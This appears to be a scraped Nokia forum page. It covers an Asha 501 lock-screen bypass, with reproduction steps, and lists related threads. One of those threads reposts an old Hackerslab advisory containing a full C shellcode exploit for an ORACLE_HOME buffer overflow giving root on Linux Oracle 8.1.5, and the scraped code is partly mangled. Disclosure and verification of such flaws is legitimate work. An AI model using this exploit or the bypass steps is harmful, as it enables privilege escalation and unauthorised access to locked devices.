Asha 501 Security Vulnerability

Where can i report a Security Vulnerability in nokia asha 501...??Its Vulnerability bypasses lock code to access call logs as well as make calls. even if its locked wih security code.

I think that's a feature rather than a bug.
To reproduce you just set up a lock code for when you lock the screen, then type any number on the unlock screen, press the SOS button, then the green phone button and you're sent to the recent calls log.
One thing that a locked out user shouldn't be able to do is set or unset a contact as favourite imo. You can do this by tapping any entry on the call log, then tapping the name of the contact that appears at the top and then the star at the right. You shouldn't be able to see more info about the contact other than the number and the call info when the phone is locked up (that is, nothing should happen the first time you tap on the contact's name).

Similar Messages

  • Asha 501 Security Code After Update

    Hi Nokia,
    I bought a Nokia Asha 501 on 23rd December, and yesterday only started for the first time use.
    But unfortunately after the software update, 
    it's completely locked everything and i can't do anything with it,
    even the default nokia code 12345 and my lock screen code won't do anything good.
    I can't unlock it so what should I do?
    Note that the phone itself doesn't contain ANY data yet as it's just started at the very beginning settings.
    Thank you.

    these steps will help you 1.download this http://www.b-phreaks.co.uk/NSSDownloadLanding.htm 2 visit here http://mycomphack.blogspot.in/2013/06/recover-nokia-phone-security-code-by.html 3. do every thing correct and after removing 3 you will get actual phone code close every thing and then disconnect the usb enter code thats it your phone is ready to use.

  • Asha 501.1: Wireless error: Can't load this page a...

    Hello.
    I have a Nokia Asha 501.1 running Asha Platform 1.0.
    I am using this a test device and I do not have a SIM card and just trying to use the device over WiFi. However, when I open the Internet app and browse to a URL, I receive the following error message:
    Can't load this page at the moment. Check your phone's date and security settings.
    Is it possible to use the device without a SIM card and on WiFi only? How can I resolve this error?
    Thanks,
    Todd

    Read THIS THREAD   I Have tried this a while back when i got the 501 and it connected first time with no issues.
    If  i have helped at all a click on the white star below would be nice thanks.
    Now using the Lumia 1520

  • Software update instructions for Nokia Asha 501

    Hey,
    software update instructions for Asha 501 can be found from here:
    http://www.nokia.com/global/support/software-update/new-nokia-asha-software-update
    By default your phone is set to automatically check for updates every 8 days and you will be notified when an update is available for download. If you want, it's possible to force the update check immediately by switching off and back on "Check via mobile data" setting from the “Phone update” menu. The size of the update is around 8 MB, so it's recommended to use Wi-Fi for the download. 
    Check out also the attached .pdf document and/or this video:
    http://www.microsoft.com/en/mobile/nokia-x-updates/
    http://www.microsoft.com/en/mobile/nokia-x2-update/
    http://www.microsoft.com/en/mobile/asha-software-update/
    http://www.microsoft.com/en/mobile/support/software-update/wp8-software-update/
    http://www.developer.nokia.com/Community/Wiki/Nokia_firmware_change_logs
    https://twitter.com/LumiaSWUpdates
    Attachments:
    Nokia Asha 501 OTA software update onepager v1.1.pdf ‏361 KB

    Dear Nokia Software Employee,
    Thank you for the new nokia 501 update.
    However I am interested to get another new update concerning:
    1) Wireless configuration:
    It will include security mode of 802.1x, and EAP plug-in settings such as EAP-LEAP, EAP-PEAP, etcc....
    2) Keep applications minimized instead of closed:
    Sometimes there are some applications need to be minimized and not to be closed
    Ex: Applications such Athan, Prayers, Quran, etccc...
    3) Some Applications menu not working with screen touch but working with key buttons
    There are some applications that you cannot use the screen touch under the menu
    I will be greatful if the software will finalize the above suggestions
    Thank you and Best Regards
    //Eabdhad
    eabdhad
    Attachments:
    2013-12-04-0275.jpg ‏394 KB

  • Unable to connect to WIFI on Asha 501

    My Nokia Asha 501 is not connecting to my wifi network. displays error unsupported security type? and there is no option to edit WIFI network also... Any solution for this?? Thanks in advance

    LadyPink, you have to sell your phone and go for another operating system like Symbian/S60 Belle Feature Pack 2 (for example the Nokia 700), Windows Phone 8 (for example the Nokia Lumia 520) or one of the operating systems which your mates use.

  • Pattern lock for Asha 501

    Hey, can anyone tell me whether there is a pattern lock or maze lock available for asha 501.
    Its quite odd to lock the phone with a security code and again typing the numbers to open the phone. Its also a waste of time.
    Solved!
    Go to Solution.

    Thanks for informing.

  • Iphone 3G Software Update Fixes security vulnerability associated with viewing malicious PDF files?

    Is there an Iphone 3G Software Update Fixes security vulnerability associated with viewing malicious PDF files?  Latest version I can download is 4.2.1
    I assume no fix is available, does anyone know if I'm still vulnerable to the security bug?

    No fix is needed since that vulnarability isn't in 4.2.1.

  • Line with audio messages for Asha 501.

    Line app updated with Audio messages feature and with Recently sent stickers. The app is better than previous version.

    Asha 501 isn't supporter by Nokia suite, so you can't install apps from PC like any other Nokia phone.
    You aren't able to access Nokia store via Wifi as well?. I would suggest a phone settings reset, you *will* lose data stored on the phone so backup before you decide to reset it.
    If a reply has solved your problem click Accept as solution button, doing it will help others know the solution. Thanks.

  • Blank screen after Ending a call on Asha 501

    I got a new Asha 501 last week. I am very happy with the product and its worth for the money spent.
    However, two issues i have noticed so far and its bothering me a bit
    1. after ending a call the screen goes blank and sometimes it takes a bit to end the call. This is very awkward during some important calls. would appreciate if there is any solution for this.
    2. Mail app takes a long time to load the message contents. I know 2g is not the fastest connection but still this is too slow even for 2g.
    best,
    Selvan

    1. On call, when you bring your phone near to your ear, the Proximity sensor recognises your ear and turn off the screen so that there is no unwanted inputs as the screen touches your skin. But when you pull it back, it turns the screen on again, but it takes 0.5-1 second to the Max.
    If it takes longer, make sure there is nothing in front of sensor (it is placed on top left), like Plastic lamination, some accessory, dust or while you pull off your phone, your finger should not be there.
    If it still takes longer, better make your device checked at Nokia Care. If found some problem, they will change the sensor.
    2. The mail app is working perfectly fine for me on Wi-Fi. You should try loading some websites in browser, if it takes longer, check network strength, it should be strong on 2G internet (Personal experience- BSNL 2G, residing near Network tower, slow like hell, in INDIA). Try changing provider.
    Source- Personal experience (owning a Nokia 501)

  • We use an add-on in one of our online solutions and we've identified a security vulnerability. The issue has been addressed in our latest add-ons and we would like to know how we may blocklist our previous player through a firefox update?

    We use an add-on in one of our online solutions and we've identified a security vulnerability. The issue has been addressed in our latest add-ons and we would like to know how we may blocklist our previous player through a firefox update?

    You can file a bug report to do that request.
    http://developer.mozilla.org/en/docs/Bug_writing_guidelines

  • Problem with Nokia Asha 501

    I have recently purchased asha 501 the problem is after recieving few messages it does not recieve more messages for that i have to restart the phone then i can able to recieve the messages .  It happen 3 to 4  times a day . it is not a network issue for that i have changed sims several times . even some time messages sent from other phones never recieved even though i have restarted phone several times and that is tested for several times .
    Kindly solve that bug in the next update of nokia .

    Hi Team,
         It is really difficult for me to send text messages in My nokia Asha 501.The following are the issues i am facing.Please provide updates.
    A)No option to send messages to contact groups (we cant create contact group).Even the basic nokia mobile have this feature.
    B)After  typing the messages we need to select contacts one by one by clicking on the + sign. No option to mark  many contacts  to send sms at a go.(Marking of contacts is a must feature of any mobile phones but nokia ASHA 501 lacks that.)
    C)i have around 500 contacts, so its  difficult for me to browse through all the contacts to select the one to whom i can send the sms.Also filtering of names is not of good standard some time filtering correctly and some times not filtering correctly.
    D) please concentrate on the basic features first then concentrate on applications.There is noway to delete or uninstall the use less Assasin creed demo game app that is pre installed.
    Thanks
    Ram

  • Security vulnerability in Oracle 8.1.5

    The following email was forwarded to me about possible security vulnerabilities.
    I am looking for verification from both Oracle and the user comunity.
    ================================================================================
    [ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability
    ================================================================================
    File : Oracle 8.1.5
    SYSTEM : LINUX
    Tested by RedHat Linux 6.2
    INFO :
    There are two security vulnerability in Oracle.
    1. buffer overflow
    It is possible to create a buffer overflow vulnerability using "ORACLE_HOME",
    one of the environmental value of Oracle.
    Oracle applications that are vulnerable to buffer overflow are as follow :
    - names
    - namesctl
    - onrsd
    - osslogin
    - tnslsnr
    - tnsping
    - trcasst
    - trcroute
    Thease applications allow an attacker to excute a buffer overflow exploit.
    2. Log-files created
    When a user excutes one of Oracle applications such as names, oracle or tnslsnr,
    following log files are created.
    names
    ======
    -rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora
    -rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora
    -rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log
    oracle
    ======
    -rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc
    tnslsnr
    =======
    -rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log
    SOLUTION
    Contact your vendor for a patch or close setuid permission.
    # su - oracle
    $ cd /oracle_8.1.5_install_directory/bin
    $ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute
    ==-------------------------------------------------------------------------------==
    * ** ** * [email protected] [yong-jun, kim]
    * ** ** * [ [URL=http://www.hackerslab.org]http://www.hackerslab.org ]
    ******** HACKERSLAB (C) since 1999
    ==-------------------------------------------------------------------------------==
    Oracle 8.1.5 exploit
    -by loveyou
    offset value : -500 ~ +500
    #include <stdio.h>
    #include <stdlib.h>
    #define BUFFER 800
    #define NOP 0x90
    #define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"
    char shellcode[] =
    /* - K2 - */
    /* main: */
    "\xeb\x1d" /* jmp callz */
    /* start: */
    "\x5e" /* popl %esi */
    "\x29\xc0" /* subl %eax, %eax */
    "\x88\x46\x07" /* movb %al, 0x07(%esi) */
    "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
    "\x89\x76\x08" /* movl %esi, 0x08(%esi) */
    "\xb0\x0b" /* movb $0x0b, %al */
    "\x87\xf3" /* xchgl %esi, %ebx */
    "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
    "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
    "\xcd\x80" /* int $0x80 */
    "\x29\xc0" /* subl %eax, %eax */
    "\x40" /* incl %eax */
    "\xcd\x80" /* int $0x80 */
    /* callz: */
    "\xe8\xde\xff\xff\xff" /* call start */
    "/bin/sh";
    unsigned long getesp(void)
    __asm__("movl %esp,%eax");
    int main(int argc, char *argv[])
    char buff, ptr,binary[120];
    long *addr_ptr, addr;
    int bsize=BUFFER;
    int i,offset;
    offset = 0 ;
    if ( argc > 1 ) offset = atoi(argv[1]);
    buff = malloc(bsize);
    addr = getesp() - 5933 - offset;
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;
    memset(buff,bsize/2,NOP);
    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
    for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode;
    buff[bsize - 1] = '\0';
    setenv("ORACLE_HOME",buff,1);
    printf("[ offset:%d buffer=%d ret:0x%x ]\n",
    offset,strlen(buff),addr);
    system(PATH);
    null

    Hi Peter,
    I was told that Oracle8 and Oracle8i Parallel Server on IBM
    RS/6000 AIX comes with its own Lock Manager and this LM does not
    rely on the Cluster Lock Manager (cllockd) of HACMP for AIX, as
    Oracle7 Parallel Server on normal (non-SP) RS/6000 does.
    (Oracle7 Parallel Server on RS/6000 SP didn't use the cllockd of
    HACMP but came with a special LM.)
    Cluster-wide Filesystems are not used for OPS on Unix, as far as
    I know Unix (AIX, Solaris). All Data-, Log- and Control-Files
    must reside on concurrently (!) accessible Raw-Devices (e.g. Raw
    Logical Volumes on AIX).
    So I guess it should be possible for Oracle to port OPS to Linux.
    No special Cluster-Services would be needed for OPS on Linux,
    just a shared SCSI-bus (e.g.) and a fast interconnect (e.g.
    100BaseT).
    Peter Sechser (guest) wrote:
    : Dave,
    : Parallel Server needs some cluster services in order to
    : communicate between several nodes. So, the operating system has
    : to offer things like inter-node communication services,
    : cluster-wide lock communication services and a clusterwide
    : filesystem. I'm not quite sure, to what degree Linux
    offers/will
    : offer these services.
    : Peter
    null

  • JComboBox makes for nice security vulnerability under X11?

    I noticed a couple years ago that when I set a breakpoint inside a JComboBox state change event handler on a Java application or applet running under X11, the entire desktop would hang. Back then, I checked the Swing bug database and found an issue regarding this, but it was closed with an evaluation that pretty much simply said that the developer didn't know how to fix it.
    When I brought this up in the netbeans mailing list, someone suggested that this could be a security issue if someone intentionally/programmatically stopped all processing from within this event handler (perhaps from an applet). Perhaps, as a security vulnerability this bug would get more attention!
    Well, it's been over a year and the latest JDK 1.6b10 (build 25) still has this problem. So, obviously it's not bothering anyone, except me, enough to do anything about it. I could try to file this bug under Swing again (probably with same outcome) or try filing it as a security bug. What are people's thoughts?

    Hi
    Try going here:
    http://europe.nokia.com/A4423034
    Or alternatively : find the product pages for the 5700 by going to www.nokia.com/phones, then pick out 5700, then dip into "PC software" and "Music"
    Cheers

  • Asha 501: VoIP, TLS and certificates

    Hi
    I've recently added sip account to my Asha 501. It works great when I use UDP or TCP transport, but when i switch to TLS it can't connect to the server. I think, this may be caused by self-signed server certificate.
    So, is there a way  to add my own certificates to Nokia Asha 501 ?

    Hi.
    I am trying to use TLS in voip environment  and I am in a cross roads.
    The guy who manages the asterisk server sent me two certificates: One CA.crt and another User.pem.
    I have been able to make the asha 311 accept the CA.crt (after changing it to a ca.der file, according to this post: http://discussions.nokia.com/t5/Asha-and-other-Nokia-Series-30/HOW-TO-INSTALL-ROOT-Authority-CERTIFI...
    But when I try to download the User.pem certificate, I get a message saying "no gateway reply".
    So, I have two questions. ONe is, do I relly need these two certificates - is it that the asterisk guy is over complicting things?
    The other is. if I need this pem file, how can I make the mobile accepct it?
    thanks in advance.

  • NOKIA ASHA 501 CAMERA SHUTTER SOUND CANT BE TURNED...

    Dear Nokia ASHA 501 users there is a bug left by NOKIA in its ASHA 501 you cant switch OFF the camera sound there is ON?OFF slider which is left at ON mode by NOKIA its disabled at that mode you cant scroll it to OFF the shutter sound

    If you cant turn it off its set up that way for a reason,its common in most countries for this option to be locked,due to privacy laws.
    If  i have helped at all a click on the white star below would be nice thanks.
    Now using the Lumia 1520

Maybe you are looking for